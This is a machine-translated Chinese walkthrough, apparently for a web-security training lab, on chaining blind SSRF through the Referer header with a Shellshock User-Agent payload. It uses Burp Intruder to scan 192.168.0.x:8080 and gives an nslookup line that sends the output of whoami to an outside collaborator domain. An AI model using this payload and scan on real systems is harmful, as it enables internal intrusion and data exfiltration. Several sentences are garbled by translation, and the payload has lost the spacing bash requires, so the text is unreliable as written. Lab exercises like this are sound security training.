实验室:盲目SSRF与壳壳剥削
专家
该站点使用分析软件,该软件在加载产品页面时获取引用标头中指定的URL。
要解决实验室,请使用此功能执行盲人SSRF攻击内部服务器192.168.0.x
在端口8080上范围。在盲目攻击中,使用对内部服务器的ShellShock有效负载来渗透OS用户的名称。
笔记
为了防止用于攻击第三方的学院平台,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,您必须使用BURP协作者的默认公共服务器。
解决方案
- 在Burp Suite专业人士,从BAPP商店安装“无处不在的合作者”扩展名。
- 将实验室的域添加到Burp Suite目标范围,以便各地的合作者可以针对它。
- 浏览网站。
- 观察到,当您加载产品页面时,它会通过参考器标头触发与Burp合作者的HTTP交互。
- 观察到HTTP交互在HTTP请求中包含您的用户代理字符串。
- 将请求发送到产品页面以进行打击。
利用Burp合作者客户端为了产生独特的BURP合作者有效负载,并将其放入以下ShellShock有效载荷中:
(){:;};/usr/bin/nslookup $(whoami).burp-collaborator-subdomain
- 用包含您的协作者域的Shellshock有效载荷替换Burp入侵者请求中的用户代理字符串。
- 单击“清除§”,将推荐人标头更改为
http://192.168.0.1:8080
然后突出显示IP地址的最终八位位(数字1
),单击“添加§”。
- 切换到“有效负载”选项卡,将有效负载类型更改为数字,然后在“从”和“到”和“和“阶梯”框中输入1、255和1。
- 单击“开始攻击”。
- 攻击结束后,请返回Burp Concomborator Client窗口,然后单击“立即进行民意调查”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。您应该看到由成功盲人击中的后端系统发起的DNS互动SSRF攻击。OS用户的名称应出现在DNS子域中。
- 要完成实验室,请输入OS用户的名称。